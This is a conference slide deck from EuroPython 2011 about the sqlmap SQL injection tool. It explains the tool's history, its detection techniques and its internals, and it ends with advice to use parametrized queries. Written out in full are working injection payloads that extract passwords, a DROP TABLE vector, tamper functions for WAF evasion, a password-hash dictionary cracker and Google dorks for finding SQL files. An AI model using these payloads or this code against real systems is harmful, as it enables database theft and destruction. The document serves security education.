Sqlmap - Security Development in Python

Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws. It has powerful detection and enumeration engines that can take over database servers by extracting data like usernames, passwords, privileges and databases. The tool supports many databases and SQL injection techniques. It has been under active development since 2006 with the goal of improving functionality and adding support for new databases and techniques.

Uploaded by miroslav_stampar
Copyright: Attribution Non-Commercial (BY-NC)
sqlmap - security development in Python

Miroslav Štampar

Who are we?

- Bernardo Damele A. G. (@inquisb)
  Security Consultant / White-hat hacker, NGS Secure, London / UK
  Lots of conference talks
- Miroslav Stampar (@stamparm)
  Professional software developer, AVL Croatia, Zagreb / Croatia
  First conference talk

EuroPython 2011, Florence (Italy), June 23, 2011

What is sqlmap?

- sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database server(s)
- AIO (All-In-One) SQL injection tool
- Over 10k updates and/or downloads monthly
- Part of popular security distros: BackTrack, BackBox, Web Security Dojo, OWASP Web Testing, ...

Short history

- July 25th of 2006: birthday of sqlmap, started by Daniele Bellucci (@belch)
- September 2006: Daniele leaves the project, Bernardo takes it over
- December 2009: Miroslav replies to the call for developers

Current status (v1.0-dev)

- Powerful detection engine
- State of the art enumeration engine
- Takeover functionalities (Metasploit, ...)
- Support for IDS/WAF evasion in the form of tampering scripts
- Numerous optimizations
- Remote file manipulation
- Brute force methods

Short future

- GUI
- Professional reporting (XML, PDF, ...)
- Out-of-Band (OOB) advanced techniques
- Support for the few DBMSes left
- Generic lexical SQL parser
- Advanced IDS/WAF evasion techniques
- Upgrade to Python 3

Project statistics (ohloh.net)

(charts: languages used; LOC (lines of code))

Features

- Fully supported backend DBMSes (and growing): MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB
- Fully supported SQL injection techniques: Blind, Error, Union (partial & full), Timed, Stacked
- Enumeration of: database users, users' password hashes, users' privileges, users' roles, databases, tables and columns

Features (2)

- Recognition and cracking of password hashes
- Web server file upload/download
- Arbitrary command execution and retrieval of standard output
- Establishment of an out-of-band TCP/UDP connection between the attacker's machine and the database server

Community

- Huge pool of pen/beta-testers active on our mailing list (at this moment 200 subscribed)
- White/Grey/Black hat hackers
- They all provide indispensable help by:
  - Reporting problems/bugs from real-life scenarios
  - Feature requests
  - Keeping morale high
  - Modest donations (covering SVN server costs)

SQL injection for dummies

Vulnerable code (PHP/PgSQL):

$query = "SELECT * FROM products WHERE product_id=" . $_GET['id'];

Attack vector:

http://www.store.com/store.php?id=7; DROP TABLE users

Resulting SQL statements (the unquoted, unvalidated id lets the attacker terminate the intended statement and append a second one, and PostgreSQL's pg_query() executes both):

SELECT * FROM products WHERE product_id=7; DROP TABLE users

Well known attacks

- In the period 2005 till 2007 Albert Gonzalez stole 130 million credit card numbers
- June 2007: Microsoft U.K. website defaced
- December 2009: RockYou (32 million credentials stolen)
- December 2009: NASA
- July 2010: The Pirate Bay

Well known attacks (2)

- February 2011: HBGary
- March 2011: MySQL (the vulnerable page was http://mysql.com/customers/view/index.html?id=1170)
- March & May 2011: Comodo (certificate reseller)
- May 2011 ...: PBS, Sony (#sownage, 20 sites and counting), Fox, Infragard, Nintendo, CNN, ...

Lizamoon (mass injection)

"LizaMoon mass injection hits over 226,000 URLs" - Websense Security Labs (29th Mar 2011)

"The world was rocked today by LizaMoon - a SQL injection attack which has compromised well over one million Websites" - PCWorld (2nd Apr 2011)

Random Quote

Structured Query Language is becoming the Achilles heel of the Internet.

Exploits of a Mom (XKCD #327)

(comic strip image)

Funny Swedes

The following lines were in the Swedish election votes (swe. VALJ = engl. voting):

;13;Hallands län;80;Halmstad;01;Halmstads västra valkrets;0904;Söndrum 4;pwn DROP TABLE VALJ;1

At least 'pwn DROP TABLE VALJ' got 1 vote in the Swedish election (comment on reddit :)

- SQL

- Awkward Russian underground (open) forum
- No chat, only vulnerable targets
- Around 14 thousand targets (and growing) available to anyone

Blind-based technique

- Also known as boolean-based and/or "1=1"
- 4 out of 5 vulnerable cases are affected
- Slow: 1 request per 1 bit of information
- Very demanding and sensitive for implementation (detection part)
- Differentiation approach (difflib.quick_ratio()) or exact approach (e.g. "You are logged in" present in the page content)
- Greatest obstacle is dynamicity
- Multi-threading is most welcome

Blind-based technique (2)

(screenshots: original page, True response, False response)

Error-based technique

- 1 out of 4 vulnerable cases are affected
- Deliberate provoking of an invalid SQL query and retrieval of information from the response (error) messages
- Fast: 1 request per item of information
- Easy detection and implementation
- Greatest obstacle is trimming of error messages (substringing)
- Too DBMS specific
- Advice: turn off the error/debug messages!

Error-based technique (2)

Example: (screenshot)

Union query technique

- Also known as inband
- 1 out of 2 vulnerable cases are affected
- Fast(est): 1 request per (multiple) item(s) of information
- Partial vs Full union
- Greatest obstacle is the speed of the detection part
- Easy for implementation, at least for the usage part

Union query technique (2)

Example 1 (partial): (screenshot)

Example 2 (full): (screenshot)

Time delay-based technique

- Pretty much the same as blind-based
- Among the slowest: 1 request per 1 bit of information
- Expect every second response to be delayed
- Very demanding and sensitive for implementation
- Greatest obstacle is lagging
- Single threading is a must for stable data retrieval

Time delay-based technique (2)

Example (delayed by 5 seconds): (screenshot)

Resulting SQL statement:

SELECT * FROM users WHERE id=1 AND 1=(SELECT 1 FROM PG_SLEEP(5))--

Stacked query technique

- Pretty much identical to the time-based
- Around 1 out of 2 DBMSes support it
- Deadly (Lizamoon)
- MsSQL is most affected
- Allows non-query commands (INSERT, DELETE, ...)

Stacked query technique (2)

Example (delayed by 5 seconds): (screenshot)

Basic working examples

Blind-based:
...id=1 AND ASCII(SUBSTR((SELECT password FROM public.users OFFSET 0 LIMIT 1)::text,1,1)) > 64--

Error-based:
...id=1 AND 6561=CAST(':abc:'||(SELECT password FROM public.users OFFSET 0 LIMIT 1)::text||':def:' AS NUMERIC)--

Union query:
...id=1 UNION ALL SELECT NULL,NULL,':abc:'||password||':def:'||':ghi:'||password||':jkl:'||':mno:'||id||':pqr:' FROM public.users--

Basic working examples (2)

Time-delay based:
...id=1 AND 1924=(CASE WHEN (ASCII(SUBSTR((SELECT password FROM public.users OFFSET 0 LIMIT 1)::text,1,1)) > 64) THEN (SELECT 1924 FROM PG_SLEEP(1)) ELSE 1924 END)--

Stacked query:
...id=1; SELECT (CASE WHEN (ASCII(SUBSTR((SELECT password FROM public.users OFFSET 0 LIMIT 1)::text,1,1)) > 64) THEN (SELECT 1924 FROM PG_SLEEP(1)) ELSE 1924 END);--

Program's structure

- doc: manual, THANKS, ...
- lib: core modules
- extra: 3rd party modules (chardet, clientform, ...)
- plugins: DBMS specific modules
- shell: stagers and backdoors (php, jsp, asp, ...)
- tamper: tampering scripts (ifnull2ifisnull, ...)
- txt: wordlist, user-agents, ...
- xml: queries, payloads, ...

Program's workflow

Setup -> Detection -> Fingerprinting -> Enumeration -> Takeover

- Setup: Configuration
- Detection: Boolean, Error, Union, Timed, Stacked
- Fingerprinting: MySQL, MsSQL, PgSQL, Oracle, MsAccess, ...
- Enumeration: Databases, Tables, Columns, Users, Passwords, ...
- Takeover: Web shell, Metasploit, ICMPsh, File access, Registry, ...
- Knowledge base (shared by all stages): Session, Connection, Payloads, Queries, ...
Development environment

- Subversion (version control)
- Redmine (project management)
- Python 2.6 and/or 2.7
- Text editor of choice (TC/Notepad++ on Windows, Krusader/KrViewer on Linux)
- Debugger of choice (pdb)
- Proxy MITM tool (Burp)
- Web browser of choice (Firefox)

Testing environment

VMWare virtual machines:

- Linux Debian 5.0 32-bit (most used one)
  - Apache/PHP
  - MySQL, Oracle, PgSQL, Firebird, SQLite
- Windows XP 32-bit
  - XAMPP/PHP
    MySQL, SAP MaxDB, Sybase, SQLite, Access, etc.
  - IIS/ASP(.NET)
    MsSQL, MySQL, etc.

Inference (binary search)

- O(log2 n) complexity
- Can be used in boolean, timed and stacked techniques
- e.g.:

Initial table:           ['A','B',...,'Z']
AND (...) > 'M' (True)   -> ['N',...,'Z']
AND (...) > 'S' (False)  -> ['N',...,'S']
AND (...) > 'O' (True)   -> ['P','R','S']
AND (...) > 'R' (False)  -> ['P','R']
AND (...) > 'P' (False)  -> ['P'] (resulting char)

Character prediction

- High probability of prefix reuse
- Common DBMS identifier names
- Dynamic prediction tree
- Example:
  Input: CREATE SYNONYM, CREATE TABLE, CREATE TRIGGER, CREATE USER, CREATE VIEW
  Output tree: [C][R][E][A][T][E][ ][S|T|U|V]
- Appropriate for blind/time/stacked techniques

Null-connection

- Special HTTP requests (web server specific) that retrieve only the length of the response, not its body
- Example (Apache):
  Request: Range: bytes=-1
  Response: Content-Range: bytes 74-74/75 (True)
  Response: Content-Range: bytes 126-126/127 (False)
- Example (IIS):
  Request: HEAD
  Response: Content-Length: 75 (True)
  Response: Content-Length: 127 (False)

Dynamicity removal

- Biggest obstacle of the blind/boolean technique
- Javascript, ads, banners, ...
- Differentiation approach (difflib)
- Static blocks vs dynamic blocks (gaps)
- Regular expressions to the rescue
- Example:
  Page: </p></table>dynamic part<iframe><ul>
  Regex: r'</p></table>.*?<iframe><ul>'

Reflective values

- Copy of the payload (possibly encoded) inside the response
- Causing problems for the blind/boolean technique
- Source of lots of false positives/negatives (in other tools :)
- Regular expressions to the rescue
- Example:
  Payload: ?id=1 AND 2>1
  Reflected: ?id=1%20AND%202%3e1
  Regex: r'(?i)id[^\n<]+1[^\n<]+AND[^\n<]+2[^\n<]+1'
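The dynamicity-removal and reflective-values slides describe two normalisations that must happen before a True and a False page can be compared. The following added example (not sqlmap's code) does both: it derives gap regexes from two payload-free responses with difflib, builds the reflection regex from the parameter name and the payload's tokens the way the slide shows, and then compares normalised pages by difflib ratio. The page template, parameter name `id`, payloads and the 0.98 threshold are constructed for the demo.

```python
import difflib
import re

# Added example, not sqlmap's code. Constructed page template: the ad block is
# dynamic, the parameter value is reflected URL-encoded in the body.

def page(ad_id, reflected, body):
    return ("<html><p>Welcome</p></table>ad id=%s<iframe><ul><li>item</li></ul>"
            "<p>You searched for %s</p><div>%s</div></html>" % (ad_id, reflected, body))

# two payload-free requests for ?id=1, differing only in the ad block
BASELINE_A = page("1234", "id=1", "Product 1: Widget")
BASELINE_B = page("9876", "id=1", "Product 1: Widget")
# responses to the boolean test pair; the encoded payload is reflected
RESPONSE_TRUE = page("5555", "id=1%20AND%202%3e1", "Product 1: Widget")
RESPONSE_FALSE = page("7777", "id=1%20AND%202%3e2", "No product found")


def dynamic_markers(first, second, context=12):
    """One regex per gap where two payload-free responses differ, keyed on
    `context` static characters on either side of the gap."""
    matcher = difflib.SequenceMatcher(None, first, second)
    markers = []
    for tag, i1, i2, _j1, _j2 in matcher.get_opcodes():
        if tag == "equal":
            continue
        prefix = re.escape(first[max(0, i1 - context):i1])
        suffix = re.escape(first[i2:i2 + context])
        markers.append(re.compile("(%s)(.*?)(%s)" % (prefix, suffix), re.DOTALL))
    return markers


def reflection_pattern(param, payload):
    """Parameter name, then the payload's alphanumeric tokens in order, with
    anything but a newline or a tag start between them (space, %20, +, %3e...)."""
    tokens = re.findall(r"[A-Za-z0-9]+", payload)
    body = "".join(r"[^\n<]+" + re.escape(t) for t in tokens)
    return re.compile(re.escape(param) + body, re.IGNORECASE)


def normalize(response, markers, param, payload):
    # 1) cut the dynamic gaps, keeping the static context around them
    for marker in markers:
        response = marker.sub(r"\1\3", response)
    # 2) cut the reflected payload
    return reflection_pattern(param, payload).sub("", response)


def is_true_response(baseline, base_payload, response, payload, markers,
                     param="id", threshold=0.98):
    """True when the normalized response is (almost) the original page."""
    a = normalize(baseline, markers, param, base_payload)
    b = normalize(response, markers, param, payload)
    return difflib.SequenceMatcher(None, a, b).ratio() >= threshold


if __name__ == "__main__":
    markers = dynamic_markers(BASELINE_A, BASELINE_B)
    print([m.pattern for m in markers])
    print(is_true_response(BASELINE_A, "1", RESPONSE_TRUE, "1 AND 2>1", markers))
    print(is_true_response(BASELINE_A, "1", RESPONSE_FALSE, "1 AND 2>2", markers))
```

Without step 2 the True page would differ from the baseline only by its reflected `%20AND%202%3e1`, enough to drop the ratio below the threshold and produce exactly the false negative the slide warns about.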

Statistics is our friend

- Normal distribution (bell curve)
- Standard deviation shows how much variation or 'dispersion' there is from the average (mean, or expected value)
- 99.9999999997440% of normal data lies inside ±7σ

Statistics is our friend (2)

- UNION injection detection:
  id=1 UNION ALL SELECT NULL, NULL, ...
  The right number of columns should stick out (its response differs from all the wrong ones)
- Time-delay injection detection/usage:
  id=1 AND 1=(SELECT 1 FROM PG_SLEEP(5))--
  Response time should stick out
- Stacked-query injection detection/usage:
  id=1; SELECT 1 FROM PG_SLEEP(5)--
  Response time should stick out
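The 7σ rule from the previous slide applied to response times, as an added example (not sqlmap's timing code): the baseline of payload-free round-trip times, the cut-off of seven standard deviations above the mean, and the per-bit timings used to decode one character are all constructed for the demo.

```python
import statistics

# Added example (not sqlmap's code). Constructed baseline: round-trip times in
# seconds of ten payload-free requests to the same page.
BASELINE = [0.21, 0.19, 0.23, 0.20, 0.22, 0.18, 0.24, 0.21, 0.20, 0.22]


def delay_threshold(samples, sigmas=7.0):
    """Under a normal model an undelayed response lands above mean + 7 sigma
    roughly once in 10^12 times, so anything above it is a real delay."""
    return statistics.mean(samples) + sigmas * statistics.pstdev(samples)


def is_delayed(elapsed, samples=BASELINE, sigmas=7.0):
    return elapsed > delay_threshold(samples, sigmas)


def decode_char(timings, samples=BASELINE):
    """Time-based extraction of one 7-bit character: request i asked whether
    bit i of ASCII(char) is set and slept (PG_SLEEP) only when it was.
    timings[0] belongs to the most significant bit."""
    value = 0
    for elapsed in timings:
        value = (value << 1) | (1 if is_delayed(elapsed, samples) else 0)
    return chr(value)


# Constructed timings for the 7 bit-requests of the letter 'P' (0x50 = 1010000):
# the delayed ones carry the 5-second sleep on top of normal latency.
TIMINGS_P = [5.21, 0.19, 5.23, 0.20, 0.21, 0.22, 0.20]


if __name__ == "__main__":
    print("threshold: %.3f s" % delay_threshold(BASELINE))
    print("decoded:", decode_char(TIMINGS_P))
```

The threshold only works when the baseline is measured on the same page under the same conditions as the test: a baseline with near-zero variance makes ordinary network jitter "stick out", which is the lagging problem the time-delay slide mentions and the reason single-threaded retrieval is used there.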

False positives

- Boolean, timed and stacked affected
- Example: search engine queries
- Simple arithmetic tests: searching for mere signs of intelligence
- Example:
  1+2==3 (True), 4==5 (False), 2==(7-5) (True), (6+5)==(6-5) (False)

Heuristic test

- Blatant logic used for detection
- Insufficient but a great one-shot test
- Parameter poisoning with invalid (SQL) chars
- Example: ?id=1''))((''(
- Error message parsing and DBMS recognition
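The heuristic test in code, as an added example that is not sqlmap's own detection module: the poisoned value from the slide is appended to the parameter and the response is matched against a handful of well-known DBMS error strings. The error-pattern table is a small selection I chose, and the sample responses are constructed.

```python
import re

# Added example (not sqlmap's own detection code): poison a parameter with
# characters that break any string/parenthesis balance, then look for a
# DBMS-specific error message in the response.

HEURISTIC_POISON = "''))((''("   # the slide's payload: ?id=1''))((''(

# A small hand-picked selection of error fingerprints; real tools carry far more.
DBMS_ERRORS = {
    "MySQL": [r"You have an error in your SQL syntax",
              r"mysql_fetch_array\(\)",
              r"supplied argument is not a valid MySQL"],
    "PostgreSQL": [r"PostgreSQL query failed",
                   r"pg_query\(\)",
                   r"syntax error at or near"],
    "Microsoft SQL Server": [r"Unclosed quotation mark after the character string",
                             r"Microsoft OLE DB Provider for SQL Server",
                             r"Incorrect syntax near"],
    "Oracle": [r"\bORA-\d{5}",
               r"quoted string not properly terminated"],
    "SQLite": [r"SQLITE_ERROR",
               r"sqlite3\.OperationalError",
               r"unrecognized token:"],
}
COMPILED = {dbms: [re.compile(p, re.IGNORECASE) for p in patterns]
            for dbms, patterns in DBMS_ERRORS.items()}


def poison(value):
    """Value to send in place of the original parameter value."""
    return value + HEURISTIC_POISON


def recognize_dbms(body):
    """DBMS whose error fingerprint appears in the response body, or None."""
    for dbms, patterns in COMPILED.items():
        for pattern in patterns:
            if pattern.search(body):
                return dbms
    return None


# Constructed responses to ?id=1''))((''( from differently built applications
SAMPLE_RESPONSES = {
    "mysql": "<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid "
             "MySQL result resource in /var/www/store.php on line 12",
    "pgsql": "Warning: pg_query(): Query failed: ERROR: syntax error at or near \"''\" "
             "in /var/www/store.php on line 9",
    "mssql": "Microsoft OLE DB Provider for SQL Server error '80040e14' "
             "Unclosed quotation mark after the character string ''))((''(.",
    "oracle": "java.sql.SQLSyntaxErrorException: ORA-01756: quoted string not properly terminated",
    "clean": "<html><body>Product 1: Widget</body></html>",
}


if __name__ == "__main__":
    for name, body in SAMPLE_RESPONSES.items():
        print(name, "->", recognize_dbms(body))
```

A clean response proves nothing, which is the "insufficient" in the slide: an application that swallows errors still has to be tested with the boolean, time-based and union techniques.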

Tampering scripts

- IDS/WAF applications are getting better
- Need for anti-anti-hacking techniques
- Examples:
  'UNION SELECT'    -> 'UnIOn SeleCT'
  'A>B'             -> 'A NOT BETWEEN 0 AND B'
  'SELECT password' -> 'SELECT/**/password'
- Input: payload; Output: f_tamper(payload)
- Applied in order of appearance & prioritized
- 14 so far and counting
- Automation in the near future
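The three rewrites from the slide as tamper functions plus a prioritised chain, as an added example. These are my illustrative re-implementations, not sqlmap's tamper scripts; the function names, the priority numbers and the seeded random generator are choices made for the demo.

```python
import random
import re

# Added example, not sqlmap's tamper scripts: three illustrative tampers with
# the same shape (payload in, modified payload out), a priority each, and a
# chain that applies them in priority order.

def between(payload):
    """A > B  ->  A NOT BETWEEN 0 AND B. Equivalent only for A >= 0, which
    holds for the ASCII()/LENGTH() comparisons used by blind inference."""
    return re.sub(r"(\S+)\s*>\s*(\S+)", r"\1 NOT BETWEEN 0 AND \2", payload)


def randomcase(payload, rng=random.Random(0)):
    """UNION SELECT -> UnIOn SeleCT: defeats case-sensitive keyword matching.
    The generator is seeded only so the demo is reproducible."""
    return "".join(c.upper() if rng.random() < 0.5 else c.lower() for c in payload)


def space2comment(payload):
    """SELECT password -> SELECT/**/password"""
    return payload.replace(" ", "/**/")


# lower number runs first: syntactic rewrites before cosmetic ones, because
# between() needs real spaces to tokenize and randomcase() must see the final
# keywords
TAMPERS = [(1, between), (2, randomcase), (3, space2comment)]


def tamper_chain(payload, tampers=TAMPERS):
    for _priority, fn in sorted(tampers, key=lambda t: t[0]):
        payload = fn(payload)
    return payload


if __name__ == "__main__":
    print(tamper_chain("1 AND 2>1 UNION SELECT password"))
```

The order matters: running `space2comment` first would leave `between` nothing to split on, and a case-folding WAF rule is only beaten if `randomcase` is the last thing to touch the keywords it cares about.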

Pivoting

- Dumping technique used when the DBMS lacks a LIMIT/OFFSET mechanism
- Around 1 in 2 DBMSes affected (e.g. MsSQL)
- Count the number of DISTINCT values per column
- Choose the column with the highest number as pivot
- Pivoting:
  SELECT MIN(pivotCol) FROM table WHERE pivotCol > <previous_pivot_value>
  SELECT otherCol FROM table WHERE pivotCol = <current_pivot_value>
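The pivot dump carried out end to end, as an added example that is not sqlmap's dumping code. An in-memory SQLite table stands in for the target purely so the queries can run here; the point is that none of them uses LIMIT/OFFSET. The table, its rows and the column names are constructed.

```python
import sqlite3

# Added example (not sqlmap's code). SQLite is only a stand-in for a DBMS
# without LIMIT/OFFSET: no query below uses either. Table and rows are
# constructed. Identifiers are formatted into the SQL because they come
# from the tool's own enumeration, never from user input.

def sample_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, surname TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "smith"), (2, "bob", "smith"),
                      (3, "carol", "jones"), (4, "bob", "brown")])
    conn.commit()
    return conn


def choose_pivot(conn, table, columns):
    """Column with the most DISTINCT values. Pivoting yields one row per
    distinct pivot value, so rows sharing a pivot value would be lost."""
    counts = {}
    for col in columns:
        sql = "SELECT COUNT(DISTINCT %s) FROM %s" % (col, table)
        counts[col] = conn.execute(sql).fetchone()[0]
    return max(columns, key=lambda c: counts[c]), counts


def pivot_dump(conn, table, columns):
    """Walk the pivot with MIN(pivot) WHERE pivot > previous, then read the
    other columns WHERE pivot = current. In a real injection each of these
    scalar queries is what gets embedded in the payload, one value per query."""
    pivot, _ = choose_pivot(conn, table, columns)
    others = [c for c in columns if c != pivot]
    rows, current = [], None
    while True:
        if current is None:
            sql, params = "SELECT MIN(%s) FROM %s" % (pivot, table), ()
        else:
            sql = "SELECT MIN(%s) FROM %s WHERE %s > ?" % (pivot, table, pivot)
            params = (current,)
        current = conn.execute(sql, params).fetchone()[0]
        if current is None:          # pivot exhausted
            break
        row = {pivot: current}
        for col in others:
            sql = "SELECT %s FROM %s WHERE %s = ?" % (col, table, pivot)
            row[col] = conn.execute(sql, (current,)).fetchone()[0]
        rows.append(row)
    return rows


if __name__ == "__main__":
    db = sample_db()
    print(choose_pivot(db, "users", ["id", "name", "surname"]))
    for row in pivot_dump(db, "users", ["id", "name", "surname"]):
        print(row)
```

With `id` as pivot all four rows come back. Dumping only `name` and `surname` forces `name` (three distinct values) to be the pivot and the second "bob" row silently disappears, which is exactly why the column with the highest DISTINCT count is chosen.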

SQL harvesting

- Google is our friend:
  filetype:sql "CREATE TABLE"
  filetype:sql "INSERT INTO"
- Extraction of table and column names
- Decision based on frequency
- Gathered data used by the brute force switches:
  --common-tables
  ...AND EXISTS(SELECT * FROM table)
  --common-columns
  ...AND EXISTS(SELECT column FROM table)

Hash cracking

- Implemented DBMS specific hash functions: 10 and counting (mysql_passwd, mysql_old_passwd, mssql_passwd, ...)
- Regular expression based recognition
- High-quality (10MB) dictionary/wordlist
- Automatic brute-force approach
- Blazing fast (core routines from hashlib)
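Two of the hash formats from the slide with regex recognition and a dictionary attack built on hashlib, as an added example (not sqlmap's hash module). The MySQL 4.1+ format is `*` followed by SHA1(SHA1(password)); the MSSQL 2005 format is `0x0100`, a 4-byte salt and SHA1(UTF-16LE(password) + salt). The format names, the tiny wordlist and the fixed salt used in the demo are mine.

```python
import hashlib
import os
import re

# Added example, not sqlmap's hash module: two DBMS password hash formats,
# regex recognition and a dictionary attack. WORDLIST is a constructed stand-in
# for the real 10 MB one.

def mysql_passwd(password):
    """MySQL >= 4.1: '*' + SHA1(SHA1(password)) as upper-case hex."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def mssql_2005_passwd(password, salt=None):
    """MSSQL 2005: '0x0100' + 4-byte salt + SHA1(UTF-16LE(password) + salt)."""
    salt = os.urandom(4) if salt is None else salt
    digest = hashlib.sha1(password.encode("utf-16-le") + salt).digest()
    return "0x0100" + (salt + digest).hex().upper()


# format name -> (recognition regex, verifier(hash, candidate word))
FORMATS = {
    "mysql_passwd": (re.compile(r"^\*[0-9A-F]{40}$"),
                     lambda h, w: mysql_passwd(w) == h),
    "mssql_2005_passwd": (re.compile(r"^0x0100[0-9A-F]{48}$"),
                          # reuse the salt stored in the hash itself
                          lambda h, w: mssql_2005_passwd(w, bytes.fromhex(h[6:14])) == h),
}

WORDLIST = ["123456", "letmein", "password", "qwerty", "s3cret"]


def normalize(hash_value):
    h = hash_value.strip()
    return "0x" + h[2:].upper() if h[:2].lower() == "0x" else h.upper()


def recognize(hash_value):
    for name, (pattern, _verify) in FORMATS.items():
        if pattern.match(normalize(hash_value)):
            return name
    return None


def crack(hash_value, wordlist=WORDLIST):
    """(format, password) for the first wordlist hit, None otherwise."""
    h = normalize(hash_value)
    fmt = recognize(h)
    if fmt is None:
        return None
    _pattern, verify = FORMATS[fmt]
    for word in wordlist:
        if verify(h, word):
            return fmt, word
    return None


if __name__ == "__main__":
    print(crack("*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19"))
    print(crack(mssql_2005_passwd("letmein")))
```

The salted MSSQL format costs one SHA1 per candidate per hash, whereas the unsalted MySQL format lets one pass over the wordlist serve every hash dumped from the server, which is the pract reason the real wordlist can afford to be large.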

Quality tests

- --live-test
  - All relevant tests for the 4 major DBMSes
  - Batch-like workflow
  - Declared in a structured XML file
  - Run against testing VMs
- --smoke-test
  - Recursively finds all modules
  - Tries importing every single one of them
  - Runs doctests if explicitly written
- ./extra/shutils/pylint.py

Best self-protection advice

...you can get from a dude who makes all this anti-WAF/IDS, statistics, pivoting, dynamicity, reflective values and similar mumbo-jumbo...

Parametrized SQL statements

- Don't sanitize your database inputs yourself (prone to errors!)
- Use language/library specific parametrized SQL statements
- The driver passes the parameters separately from the statement text (or escapes them correctly for the DBMS), so a value can never change the structure of the query
- Good reference: http://bobby-tables.com/

Parametrized SQL statements (2)

Example (Python DB API):

Don't:

cmd = "UPDATE people SET name='%s' WHERE id='%s'" % (name, id)
cursor.execute(cmd)

Instead:

cursor.execute('UPDATE people SET name=:1 WHERE id=:2', [name, id])

(The placeholder syntax follows the driver's paramstyle: ':1' numeric as above for cx_Oracle, '?' for sqlite3, '%s' for psycopg2 and MySQLdb.)
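The slide's advice run against a real (in-memory SQLite) table, as an added example that is not part of the talk: the same lookup written with string formatting and with a bound parameter, fed a tautology payload, plus the one case parameters cannot cover, an identifier such as a sort column, which has to be allow-listed instead. The table, rows and payload are constructed.

```python
import sqlite3

# Added example (not from the talk): vulnerable vs parametrized lookup on an
# in-memory SQLite table. sqlite3 uses the '?' (qmark) paramstyle.

def sample_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE people (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO people (name, email) VALUES (?, ?)",
                     [("alice", "alice@example.org"), ("bob", "bob@example.org")])
    conn.commit()
    return conn


def find_vulnerable(conn, name):
    # Don't: the value becomes part of the SQL text, quotes and all
    cmd = "SELECT email FROM people WHERE name='%s'" % name
    return [row[0] for row in conn.execute(cmd)]


def find_safe(conn, name):
    # Instead: the driver sends the value separately from the statement, so a
    # quote inside it is just a character of the name being looked up
    sql = "SELECT email FROM people WHERE name=?"
    return [row[0] for row in conn.execute(sql, (name,))]


# Identifiers (table/column names, ORDER BY targets) cannot be bound as
# parameters; the only safe option is an allow-list of known values.
ALLOWED_ORDER = ("name", "email")


def list_sorted(conn, order_by):
    if order_by not in ALLOWED_ORDER:
        raise ValueError("unexpected sort column: %r" % order_by)
    return [row[0] for row in conn.execute("SELECT name FROM people ORDER BY %s" % order_by)]


# Constructed attacker input: closes the string and appends a tautology
INJECTED = "x' OR '1'='1"


if __name__ == "__main__":
    db = sample_db()
    print("vulnerable:", find_vulnerable(db, INJECTED))   # every row leaks
    print("safe:      ", find_safe(db, INJECTED))         # no such name
```

The vulnerable version returns every e-mail address for a name that does not exist; the parametrized one returns nothing, because the whole payload is compared as a literal name.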

Questions?

Join the project

Project's web page: http://sqlmap.sourceforge.net/
Contact: dev@sqlmap.org
Users list: sqlmap-users@lists.sourceforge.net
Twitter: @sqlmap
Repository: https://svn.sqlmap.org/sqlmap/trunk/sqlmap
